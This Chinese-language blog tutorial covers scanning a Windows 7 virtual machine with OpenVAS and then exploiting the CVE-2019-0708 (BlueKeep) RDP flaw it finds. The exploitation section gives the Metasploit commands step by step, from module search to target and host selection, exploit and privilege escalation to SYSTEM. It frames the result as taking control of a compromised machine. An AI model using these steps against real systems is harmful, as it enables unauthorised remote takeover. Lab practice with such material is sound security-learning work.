声明:禁止用作非法目的,谢绝一切形式的转载。
在这里对OpenVas进行了简单的介绍。这篇文章着重介绍通过OpenVas扫描出来漏洞之后,如何利用这些漏洞达到获取被入侵机器"肉鸡"的shell(也就是控制权)。
OpenVas
GSM协议
NTP – Time synchronization • Connecting to 123/udp • Mandatory • Not encrypted • May use internal NTP server Feeds (see below) • Direct
- Connecting to 24/tcp or 443/tcp
- Direct internet access required
• Via proxy
- Connecting to internal HTTP proxy supporting CONNECT method on configurable port
• Connecting to apt.greenbone.net and feed.greenbone.net • Mandatory on stand-alone and master Appliances • Used protocol is SSH • Encrypted and bidirectionally authenticated via SSH
- Server: public key
- Client: public key
术语
Alert: An alert is an action which can be triggered by certain events. In most cases, this means the output of a notification, e.g., an e-mail in case of new found vulnerabilities.
CVE: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures.
QoD: The Quality of Detection (QoD) is a value between 0 % and 100 % describing the reliability of the executed vulnerability detection or product detection.
OpenVas扫描
通过"Configuration"设置扫描目标(本文使用Vmware虚拟机 Win7 64 SP1操作系统), 通过"Scan" 设置扫描任务。扫描结果如下:
查看Nginx条目(Vmware虚拟机 Win7 64 SP1操作系统)报告信息:
从扫描结果中可以看出存在CVE-2019-0708漏洞,这是一个由微软的RDP服务引起的任意代码执行漏洞,漏洞的详细信息如下。
漏洞利用
- 开启msf
msfconsole
- 搜索模块
search cve-2019-0708
- 选择攻击模块
use 1
- 选择攻击目标
show targets
set target 2
- 设置远程目标ip
set rhost 192.168.42.148
- 执行
exploit
通过getsystem提权获得最高权限system,然后就真的可以为所欲为了。
写在最后
Win7系统的漏洞还是很多的,目前微软已经停止了对Win7系统的维护,使用Win7系统要谨慎。当然这并不能说明win10系统就安全了,漏洞也是多的可怕。
对于远程桌面,谨慎开启。3389这个端口,无论在微软的那个系统中,都是漏洞泛滥之地。
公众号
更多内容,欢迎关注我的微信公众号:无情剑客。